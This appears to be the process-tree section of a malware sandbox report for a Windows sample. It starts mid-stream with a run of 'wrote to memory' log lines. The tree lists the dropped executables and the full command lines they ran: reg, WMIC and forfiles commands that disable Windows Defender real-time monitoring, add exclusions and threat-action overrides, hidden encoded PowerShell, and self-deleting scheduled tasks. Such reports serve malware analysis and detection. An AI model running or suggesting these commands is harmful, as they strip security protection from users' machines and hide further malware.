2312 1664 Install.exe 39 PID 1664 wrote to memory of 2312 1664 Install.exe 39 PID 1664 wrote to memory of 2312 1664 Install.exe 39 PID 1664 wrote to memory of 2312 1664 Install.exe 39 PID 1664 wrote to memory of 2312 1664 Install.exe 39 PID 1664 wrote to memory of 2312 1664 Install.exe 39 PID 2312 wrote to memory of 2220 2312 Install.exe 40 PID 2312 wrote to memory of 2220 2312 Install.exe 40 PID 2312 wrote to memory of 2220 2312 Install.exe 40 PID 2312 wrote to memory of 2220 2312 Install.exe 40 PID 2312 wrote to memory of 2220 2312 Install.exe 40 PID 2312 wrote to memory of 2220 2312 Install.exe 40 PID 2312 wrote to memory of 2220 2312 Install.exe 40 PID 2220 wrote to memory of 912 2220 cmd.exe 42 PID 2220 wrote to memory of 912 2220 cmd.exe 42 PID 2220 wrote to memory of 912 2220 cmd.exe 42 PID 2220 wrote to memory of 912 2220 cmd.exe 42 PID 2220 wrote to memory of 912 2220 cmd.exe 42 PID 2220 wrote to memory of 912 2220 cmd.exe 42 PID 2220 wrote to memory of 912 2220 cmd.exe 42 PID 912 wrote to memory of 1004 912 forfiles.exe 43 PID 912 wrote to memory of 1004 912 forfiles.exe 43 PID 912 wrote to memory of 1004 912 forfiles.exe 43
Processes
-
C:\Users\Admin\AppData\Local\Temp\04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe"C:\Users\Admin\AppData\Local\Temp\04cd12393aa1e04aaca2f1f05a0da8ea1b0003a01a66dfc863991034f836f45a.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
- Checks computer location settings
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:548 -
C:\Users\Admin\Documents\iofolko5\HLRTzezunT2Ovldb8V_kvkmU.exeC:\Users\Admin\Documents\iofolko5\HLRTzezunT2Ovldb8V_kvkmU.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Users\Admin\AppData\Local\Temp\7zS277E.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Users\Admin\AppData\Local\Temp\7zS2C9C.tmp\Install.exe.\Install.exe /JgvdidbZmp "385121" /S5⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"7⤵
- Indirect Command Execution
- Suspicious use of WriteProcessMemory
PID:912 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵
- System Location Discovery: System Language Discovery
PID:1004 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 69⤵PID:1944
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"7⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:1568 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵PID:1828
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 69⤵PID:1112
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"7⤵
- Indirect Command Execution
PID:2480 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵
- System Location Discovery: System Language Discovery
PID:2184 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 69⤵
- System Location Discovery: System Language Discovery
PID:2988
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"7⤵
- Indirect Command Execution
PID:1780 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵PID:2492
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 69⤵
- System Location Discovery: System Language Discovery
PID:1500
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"7⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:328 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵PID:2980
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force9⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3064 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force10⤵PID:2952
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"6⤵
- Indirect Command Execution
PID:2404 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵PID:2416
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2544 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2080
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bPUtwrklxNafuwbpPq" /SC once /ST 00:47:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ISLwUKPJvjhlTXkiU\sHoVhEivufNzyEd\TcPDtnB.exe\" 0H /qdidn 385121 /S" /V1 /F6⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2604
-
-
-
-
-
C:\Users\Admin\Documents\iofolko5\lk9Ldxrg3RRzMhQo5WbjR_Uy.exeC:\Users\Admin\Documents\iofolko5\lk9Ldxrg3RRzMhQo5WbjR_Uy.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:780 -
C:\Users\Admin\Documents\iofolko5\ccGDScQhwtMv7tbRf1m2JKtr.exeC:\Users\Admin\Documents\iofolko5\ccGDScQhwtMv7tbRf1m2JKtr.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2932 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1992 -
C:\ProgramData\EBAFBGIDHC.exe"C:\ProgramData\EBAFBGIDHC.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:568 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:1640
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 568 -s 927⤵
- Loads dropped DLL
- Program crash
PID:2732
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\AKEBFCFIJJKK" & exit6⤵PID:1632
-
C:\Windows\SysWOW64\timeout.exetimeout /t 107⤵
- Delays execution with timeout.exe
PID:1396
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2932 -s 925⤵
- Loads dropped DLL
- Program crash
PID:1384
-
-
-
-
C:\Users\Admin\Documents\iofolko5\1TcV9bBuQfLHLuk8CggizKpL.exeC:\Users\Admin\Documents\iofolko5\1TcV9bBuQfLHLuk8CggizKpL.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1480
-
-
C:\Users\Admin\Documents\iofolko5\NBgv1H4QcTrdOqAY8RuX3Rzz.exeC:\Users\Admin\Documents\iofolko5\NBgv1H4QcTrdOqAY8RuX3Rzz.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:1816 -
C:\Users\Admin\AppData\Local\Temp\service123.exe"C:\Users\Admin\AppData\Local\Temp\service123.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:912
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:2616
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {B62C6EA3-F399-4CB5-AE36-8C8696B46C4C} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]1⤵PID:2436
-
C:\Users\Admin\AppData\Local\Temp\service123.exeC:\Users\Admin\AppData\Local\Temp\/service123.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:932 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1312
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3032 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1964
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1804 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1940
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {A0523154-D89A-4175-9B8D-5A5F946E6A14} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2656
-
C:\Users\Admin\AppData\Local\Temp\ISLwUKPJvjhlTXkiU\sHoVhEivufNzyEd\TcPDtnB.exeC:\Users\Admin\AppData\Local\Temp\ISLwUKPJvjhlTXkiU\sHoVhEivufNzyEd\TcPDtnB.exe 0H /qdidn 385121 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:816 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- System Location Discovery: System Language Discovery
PID:2512 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
PID:2376 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:1728
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:1804
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2984 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:2940 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:2996
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
- System Location Discovery: System Language Discovery
PID:2184 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:2480 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2000
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
- Indirect Command Execution
PID:1940 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
- System Location Discovery: System Language Discovery
PID:3000 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
- System Location Discovery: System Language Discovery
PID:1204
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Indirect Command Execution
PID:2072 -
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- System Location Discovery: System Language Discovery
PID:2692 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2064 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵
- System Location Discovery: System Language Discovery
PID:1216
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gDOmkEAdI" /SC once /ST 00:21:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
PID:2160
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gDOmkEAdI"3⤵PID:888
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gDOmkEAdI"3⤵
- System Location Discovery: System Language Discovery
PID:2812
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:2464
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2080
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2548 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1516
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "guOfrMzuU" /SC once /ST 00:19:40 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2624
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "guOfrMzuU"3⤵PID:2060
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "guOfrMzuU"3⤵PID:1700
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵
- Indirect Command Execution
PID:1104 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵
- System Location Discovery: System Language Discovery
PID:2308 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2332 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2288
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ujfGTnqxDJAJlXPO" /t REG_DWORD /d 0 /reg:323⤵PID:2112
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ujfGTnqxDJAJlXPO" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:484
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ujfGTnqxDJAJlXPO" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:576 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ujfGTnqxDJAJlXPO" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:2852
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ujfGTnqxDJAJlXPO" /t REG_DWORD /d 0 /reg:323⤵PID:1512
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ujfGTnqxDJAJlXPO" /t REG_DWORD /d 0 /reg:324⤵PID:1480
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ujfGTnqxDJAJlXPO" /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:2324 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ujfGTnqxDJAJlXPO" /t REG_DWORD /d 0 /reg:644⤵PID:920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\ujfGTnqxDJAJlXPO\dVAxNtVU\eQgoxRKGTZiQbVVr.wsf"3⤵
- System Location Discovery: System Language Discovery
PID:2720
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\ujfGTnqxDJAJlXPO\dVAxNtVU\eQgoxRKGTZiQbVVr.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1568 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hAvrKMWSYNakC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hAvrKMWSYNakC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:2136
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qAoVUhkTniXvoTDenZR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:2492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qAoVUhkTniXvoTDenZR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:3064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rEeGjZNaAiUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:2064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rEeGjZNaAiUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\skJyvfnXIyXU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
- System Location Discovery: System Language Discovery
PID:1748
-
-
